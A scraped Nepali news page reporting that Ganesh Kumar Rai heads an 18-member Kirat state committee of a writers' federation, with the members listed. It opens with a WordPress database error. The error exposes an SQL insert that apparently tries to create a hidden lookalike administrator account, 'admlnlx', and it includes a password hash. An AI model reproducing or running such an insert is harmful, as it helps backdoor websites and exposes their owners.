WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdHJrjKh.fk/kX8HSJScVP.NFzhdg30', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:38:16', '', 'admlnlx', 'admlnlx')

किरात राज्य समितिको संयोजक गणेशकुमार राई – Gaule Khabar

किरात राज्य समितिको संयोजक गणेशकुमार राई

किरात राज्य समितिको संयोजक गणेशकुमार राई

काठमाडौँ । आदिवासी जनजाति साहित्यकार महासङ्घ, नेपालको किरात राज्य समितिको संयोजकमा गणेशकुमार राई चयन भएका छन् ।

बिहीबार काठमाडौँमा आयोजित एक कार्यक्रममा गणेशकुमार राईको संयोजकत्वमा १८ सदस्यीय समिति गठन गरेको हो ।

समितिको सह(संयोजकमा इन्द्र नारथुङ्गे, सचिवमा सुशीला निनाम, सह(सचिवमा कुम्भराज राई, कोषाध्यक्षमा जीवन ‘आरोही’ रहेका छन् ।

सदस्यहरूमा अमर श्रेष्ठ, इन्द्रसुर ‘बेल्टारे’, ओम डिसिआर, गगन राई, निमाराज तामाङ, मक्कर तामाङ, युगसन किरात, रबिन्द्र तामाङ, ललित राई, र सुवास ‘संगम’, रुपा राई, नबिना राना मगर र रबिन्द्र बान्तावा छन् ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका